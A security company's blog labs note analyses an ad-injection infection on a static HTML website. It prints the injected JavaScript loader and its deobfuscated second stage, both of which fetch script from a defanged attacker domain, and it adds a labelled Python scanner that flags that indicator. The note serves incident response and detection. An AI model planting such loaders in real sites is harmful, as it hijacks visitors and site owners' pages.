Sucuri Blog

Website Security News

Labs Note

Unwanted Sex Toys Advertisement

November 8, 2016, by Eugene Wozniak


Recently, during an incident response engagement, we found a floating advertisement banner on specific pages of an HTML-based website. Despite what people think, these websites are also targets of attacks and can be infected.

Unlike on other platforms, the entry point in this scenario is easier to detect, because HTML-based pages are static content and there are fewer components that could make the website prone to a particular vulnerability.

The following unwanted banner was added to the victim’s website and floated across different pages:

After a quick investigation, we found that it was being triggered by the following code:

    <script>
        (function(d, s, id) {
            var js, fjs = d.getElementsByTagName(s)[0];
            if (d.getElementById(id)) return;
            js = d.createElement(s);
            js.id = id;
            js.src = "//cdn[.]googletoolservices[.]com/jquery-ui[.]js";
            fjs.parentNode.insertBefore(js, fjs);
        }(document, 'script', 'jquery-uisdk'));
    </script>

The code above is just the first stage of the attack. It requests cdn[.]googletoolservices[.]com/jquery-ui[.]js and fetches the malicious payload, which is obfuscated with JS Packer compression. After deobfuscating it, we get this script:

    var x113110_hit;
    if (typeof(x113110_hit) == "undefined") {
        (function() {
            var params = {};
            ...
            var args = '';
            for (var i in params) {
                if (args != '') {
                    args += '&'
                }
                args += i + '=' + encodeURIComponent(params[i])
            }
            var st = document.createElement('script');
            st.type = 'text/javascript';
            st.async = true;
            st.charset = 'utf-8';
            st.src = '//cdn[.]googletoolservices[.]com/jquery[.]js?' + args;
            var s = document.getElementsByTagName('script')[0];
            s.parentNode.insertBefore(st, s);
            x113110_hit = true
        })()
    }

This script renders the image-based floating banner, which leads to an adult toys website when clicked (hxxp://www.la-pareja.com/?qn).

This malware could be injected into several pages of the website but not necessarily all of them, so it’s important to check all HTML pages for that particular code and, more specifically, the link ‘cdn[.]googletoolservices[.]com/jquery-ui[.]js’.
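One way to run that check across every HTML file of a site, as an added example (not Sucuri's tooling and not code from the original note). It goes slightly beyond the single link by also reporting any `src` that points to a host outside an allowlist, which catches the same loader if the domain changes. The function names, `ALLOWED_HOSTS` and `www.example.com` are assumptions for illustration.

```python
import os
import re

# Indicator from this note, stored defanged and refanged only in memory.
IOC_HOSTS = ["cdn[.]googletoolservices[.]com"]
# Assumption: hosts this site legitimately loads resources from; adjust per site.
ALLOWED_HOSTS = {"www.example.com"}
# A src set in markup (src="//host/...") or assigned in script (js.src = '//host/...').
SRC_RE = re.compile(r"""src\s*=\s*["'](?:https?:)?//([^/"'?\s]+)""", re.I)

def refang(text):
    """Turn a defanged indicator back into its live form for matching."""
    return text.replace("[.]", ".")

def scan_html(html, allowed=ALLOWED_HOSTS):
    """Return sorted (line, reason, host) findings for one HTML document."""
    iocs = {refang(h).lower() for h in IOC_HOSTS}
    findings = set()
    for lineno, line in enumerate(html.splitlines(), 1):
        for host in SRC_RE.findall(line):
            host = host.lower()
            if host in iocs:
                findings.add((lineno, "known-bad host", host))
            elif host not in allowed:
                findings.add((lineno, "unlisted external host in src", host))
    return sorted(findings)

def scan_tree(root):
    """Scan every .html/.htm file under root; return {path: findings} for hits only."""
    report = {}
    for folder, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith((".html", ".htm")):
                path = os.path.join(folder, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_html(fh.read())
                if hits:
                    report[path] = hits
    return report

# Constructed sample page: one legitimate script tag plus the loader quoted above.
SAMPLE = """<html><head><script src="//www.example.com/app.js"></script>
<script>(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0];
js = d.createElement(s); js.id = id; js.src = "//%s/jquery-ui.js";
fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'jquery-uisdk'));</script>
</head></html>""" % refang(IOC_HOSTS[0])

if __name__ == "__main__":
    for finding in scan_html(SAMPLE):
        print(finding)
```

Point `scan_tree()` at the document root of a copy of the site; pages it does not list contained no external `src` outside the allowlist.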

If you’re experiencing similar issues on your website and want it to be cleaned up, let us know.


About Eugene Wozniak

Eugene Wozniak is Sucuri’s Security Analyst who joined the company in 2016. His main responsibilities include finding malware, providing efficient cleanup procedures for Sucuri’s customers, and outlining working solutions for website security. Eugene’s professional experience covers more than a decade of web hosting experience, helpdesk support and web hosting security. When Eugene isn’t working on customers’ security, you might find him creating 3-D art for games and various indie projects, or revisiting his world in Stalker Lost Alpha. Connect with him on LinkedIn.
